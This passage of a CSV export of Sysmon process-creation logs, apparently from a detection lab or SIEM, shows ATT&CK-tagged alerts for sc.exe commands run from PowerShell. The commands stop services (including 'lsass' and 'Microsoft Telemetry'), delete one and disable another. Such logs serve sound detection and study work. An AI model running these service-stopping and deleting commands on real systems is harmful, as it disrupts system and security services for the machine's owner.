{df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.559"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-001006bd1d00}"",""processId"":""3664"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Microsoft"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:27.902",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.545 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-00103fbc1d00} +ProcessId: 2596 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Microsoft Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Microsoft Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.547522400Z"",""eventRecordID"":""2298"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.545\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-00103fbc1d00}\r\nProcessId: 2596\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Microsoft Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.545"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-00103fbc1d00}"",""processId"":""2596"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Microsoft Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:27.870",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.513 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-0010abba1d00} +ProcessId: 1480 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop lsass +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop lsass",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.515012800Z"",""eventRecordID"":""2296"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.513\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-0010abba1d00}\r\nProcessId: 1480\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop lsass\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.513"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-0010abba1d00}"",""processId"":""1480"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop lsass"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:27.810",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.467 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-001053b81d00} +ProcessId: 7884 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Microsoft Telemetry"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.468590700Z"",""eventRecordID"":""2293"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.467\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-001053b81d00}\r\nProcessId: 7884\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.467"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-001053b81d00}"",""processId"":""7884"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Microsoft Telemetry\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:27.724",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.435 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-0010bfb61d00} +ProcessId: 7984 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete SVSHost +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete SVSHost",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.437588800Z"",""eventRecordID"":""2291"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.435\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-0010bfb61d00}\r\nProcessId: 7984\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete SVSHost\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.435"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-0010bfb61d00}"",""processId"":""7984"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete SVSHost"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:27.714",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.415 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-0010f8b51d00} +ProcessId: 6716 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SVSHost +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.418172200Z"",""eventRecordID"":""2290"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.415\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-0010f8b51d00}\r\nProcessId: 6716\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.415"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-0010f8b51d00}"",""processId"":""6716"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SVSHost"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:27.634",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.347 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-00108db31d00} +ProcessId: 7796 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop xWinWpdSrv +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.348622300Z"",""eventRecordID"":""2287"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.347\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-00108db31d00}\r\nProcessId: 7796\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.347"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-00108db31d00}"",""processId"":""7796"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 